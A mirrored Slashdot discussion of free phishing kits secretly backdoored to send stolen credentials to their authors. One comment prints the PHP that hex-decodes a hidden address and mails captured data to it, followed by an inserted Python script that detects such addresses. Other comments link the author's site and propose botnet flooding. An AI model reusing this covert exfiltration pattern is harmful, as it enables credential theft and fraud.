Slashdot Mirror


Phishing Group Caught Stealing From Other Phishers

An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them. Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."

8 of 129 comments

  1. Mr-Brain's site by aerthling · · Score: 5, Informative

    Here's his site: http://thebadboys.org/Brain/

  2. Re:Nuke the phishers by FLEB · · Score: 4, Informative

    What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

    The law, mostly. It's just as illegal for someone to make "counter-malware" to break into a computer uninvited as it is for anyone else to make malicious software that breaks in.

    --
    Information wants to be free.
    Entertainment wants to be paid.
    You just want to be cheap.
  3. Re:I wish it were possible to zoom in... by Mr. Roadkill · · Score: 5, Informative

    Naturally Netcraft won't tell you the real site name :-)
    Naturally. And who can blame them? I certainly don't - who knows what kind of nasties they might have lurking on those pages waiting for unsuspecting CEOs and CIOs and security experts who ought to know better?

    However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx :-) I won't give the URL, to protect the stupid from themselves, but it's not that hard to find.

    They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc.co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.

    Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
  4. Re:Just what is stopping law enforcement? by ShaunC · · Score: 4, Informative

    Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
    No, not really.

    For the most part, these have been made federal crimes, even to the extent of superseding existing state laws. A few years ago, several states had passed fairly strong anti-spam laws. If someone violated the law, you could file against them in your local small claims court, and secure a guaranteed judgement (good luck collecting, but that's another story) if they didn't show. Slashdot regular Bennett Haselton made boilerplate of that process, as I recall. Then along came CAN-SPAM, which created huge loopholes and essentially declared that individual state laws about spam, if less tolerant than the federal statute, were no longer enforceable.

    So now it's up to the feds to prosecute spammers, phishers, and other ill-willed malfeasants. Most of the time, the feds have better things to worry about, and unless you personally can prove tens of thousands in damages, they're unlikely to raise an eyebrow. You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink." What amounts to a data warehouse with a client app to query it, $200 million later and it's scrapped. Two hundred MILLION dollars down the drain on a failed initiative to, in essence, secure some data feeds, create some transformations, and develop a GUI to query the whole shebang. You really expect these guys to track down John Dodrescu in Romania who's spoofing a Bank of America website on some zombie PCs in Italy, oh wait, that was 10 minutes ago before the TTL on the DNS expired, now it's some zombie PCs in France?

    Give me, a non-gov IT professional, a team of 10 people of my choosing, fund me with one single million dollars and some travel vouchers, and agree to keep the project going for one year. A lot of these assholes will be out of business inside of 6 months, with many of their contemporaries scared shitless of becoming the next statistic. No fatalities, just a lot of people behind bars. But the federal government doesn't work that way because as many of us are well aware, it isn't profitable to run an IT department. They'd rather hire 1,000 guys who may or may not be able to tell you which of (XM|XP|XTC) is a version of Windows, at $50K a year apiece, then bitch and moan that they can't stop the problem with $50mil so they can justify a bigger budget next year.

    America is spending more money per day in Iraq than it would take to adequately investigate, build cases against, and convict all of the prolific spammers in the entire world.

    No, I don't often wonder why these problems haven't been solved. The federal government has been tasked with solving them, and that's all the why I need.
    --
    Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
  5. The real backdoor email address... by Anonymous Coward · · Score: 2, Informative

    It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.

    Looking at the code more carefully you'll see:

    details.php includes this in the phishing page form:

    logon.php has these lines of code:
        $d="details.php";
        // read the kit's own form page back in as a string
        $erorr=file_get_contents($d);
        // find the marker "102", skip past it, take the next 46 hex
        // characters and hex-decode them (46 hex digits = 23 bytes, the
        // length of the hidden address); $IP is a misleading name
        $IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));

    and Mr-Brain.php has this:
        // the two addresses the kit user sees and is expected to edit
        $send="al-brain@hotmail.fr,albrain08@yahoo.fr";
        // the decoded hidden address rides along as a second element
        $str=array($send, $IP);
        // every element, visible and hidden, gets a copy of the captured data
        foreach ($str as $send)
            mail($send,$subject,$message,$headers);

    Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.

    The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com

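As an added example (not code from the page, the kit, or Netcraft), here is a Python script that audits a kit the way the comment above describes: it reproduces logon.php's "marker plus 46 hex characters" extraction, and it also scans every file for any hex run that decodes to an e-mail address, so that a changed marker, offset or length does not hide the backdoor. The sample details.php and Mr-Brain.php contents are constructed; the hidden field's exact layout (name="niarB", value beginning with the marker "102") is an assumption, because the form line itself is not reproduced above.

```python
import binascii
import re

# Constructed sample files modelled on the comment above; they are NOT the
# kit's own source. The hidden-field layout (name="niarB", value = marker
# "102" followed by 46 hex characters) is an assumption: it is what the
# strpos($VARS, "102")+3 / substr(..., 46) in logon.php implies, but the
# form line itself is not quoted on the page.
SAMPLE_DETAILS_PHP = """<form method="post" action="logon.php">
<input type="text" name="card">
<input type="hidden" name="niarB" value="10270696f6e6565722e627261696e40676d61696c2e636f6d">
<input type="submit" value="Continue">
</form>
"""

SAMPLE_MRBRAIN_PHP = """<?php
$send="al-brain@hotmail.fr,albrain08@yahoo.fr";
$str=array($send, $IP);
foreach ($str as $send)
    mail($send,$subject,$message,$headers);
?>
"""

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def decode_marked_hex(src, marker="102", hex_len=46):
    """Reproduce logon.php: skip past the marker, hex-decode the next hex_len chars."""
    pos = src.find(marker)
    if pos < 0:
        return None
    chunk = src[pos + len(marker):pos + len(marker) + hex_len]
    try:
        return binascii.unhexlify(chunk).decode("ascii")
    except ValueError:  # odd length, non-hex digits, or non-ASCII bytes
        return None


def find_hex_encoded_emails(src, min_bytes=8):
    """Generic scan: every hex run that decodes to an e-mail address, marker or not."""
    found = []
    for m in re.finditer(r"[0-9a-fA-F]{%d,}" % (2 * min_bytes), src):
        run = m.group(0)
        # An odd-length marker prefix ("102") shifts the nibble alignment,
        # so try each start offset and trim the tail to an even length.
        for off in range(len(run)):
            chunk = run[off:]
            if len(chunk) % 2:
                chunk = chunk[:-1]
            if len(chunk) < 2 * min_bytes:
                break
            try:
                text = binascii.unhexlify(chunk).decode("ascii")
            except ValueError:
                continue
            if EMAIL_RE.match(text) and text not in found:
                found.append(text)
                break
    return found


def visible_recipients(src):
    """The addresses a kit user sees (and is meant to edit) in $send."""
    m = re.search(r'\$send\s*=\s*"([^"]*)"', src)
    return [a.strip() for a in m.group(1).split(",")] if m else []


def audit_kit(files):
    """files: name -> source. Returns every address captured data is mailed to."""
    visible, hidden = [], []
    for src in files.values():
        visible += [a for a in visible_recipients(src) if a not in visible]
        for addr in find_hex_encoded_emails(src):
            if addr not in hidden:
                hidden.append(addr)
        marked = decode_marked_hex(src)
        if marked and EMAIL_RE.match(marked) and marked not in hidden:
            hidden.append(marked)
    return {"visible": visible, "hidden": hidden}


if __name__ == "__main__":
    report = audit_kit({"details.php": SAMPLE_DETAILS_PHP,
                        "Mr-Brain.php": SAMPLE_MRBRAIN_PHP})
    print("visible recipients:", report["visible"])
    print("hidden recipients: ", report["hidden"])
```

Run it against an unpacked kit by reading each .php and .html file into the dict passed to audit_kit. The generic scan is the part worth keeping: the marker-based decoder only works while the kit author keeps "102" and 46, whereas a hex run that decodes to something matching an e-mail pattern is suspicious in any file of a kit regardless of how the decoder is written.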
  6. Re:How times have changed: you can't trust.....wai by nacturation · · Score: 3, Informative

    I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I never needed it.
    I have a solution as well: use your credit card so that there's no liability to you even if someone does use it fraudulently. And since 1996, you've spent about $400 on this insurance you didn't need. The only time I could see that as being useful is if someone robs you while you're in the process of making a withdrawal at an ATM.
    --
    Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  7. Re:How times have changed: you can't trust.....wai by markov_chain · · Score: 2, Informative

    Citibank has this feature. They call it "Virtual Account Numbers."

    --
    Tsunami -- You can't bring a good wave down!
  8. Re:Just what is stopping law enforcement? by gujo-odori · · Score: 2, Informative

    Speaking as someone in the security industry and very closely involved with anti-phishing efforts, I have to say that the million dollars and the team of 10 wouldn't do you much good, because the phishers are not only not in the United States or Canada, where they would be relatively easy to apprehend, but are almost all in Russia, Romania, and other eastern European countries where even catching them, let alone getting them prosecuted is a much more difficult proposition. Extradition? Forget it.

    The only way a team like that might be effective is if it were a hit squad, but even then, there are just too many phishers to assassinate.

    LE has a lot more than 10 people working on this and spends far more than a million dollars a year on it, and look how hard it is to get arrests, prosecutions, and convictions (there have been some, but they are hard to get). What makes you think you could do better with only 10 people, a million bucks, and no stated LE experience, and meet all the evidentiary requirements to get a prosecution and a conviction? You'll pardon me if I take your claim with quite a few grains of salt.

    I've personally met FBI special agents who work on this area. Believe me, they know far more about this than you do, and have resources your hypothetical million dollars couldn't get you. Heck, that million bucks would just cover the salary and benefits of that team of ten (assuming they work cheap; it wouldn't cover salary and benefits for 10 people who make what I make), without even getting into any external costs of forensic lab services, equipment purchases, etc. And even if you did do better research work than the FBI, good luck convincing an eastern European police agency to follow it up after you email them about it.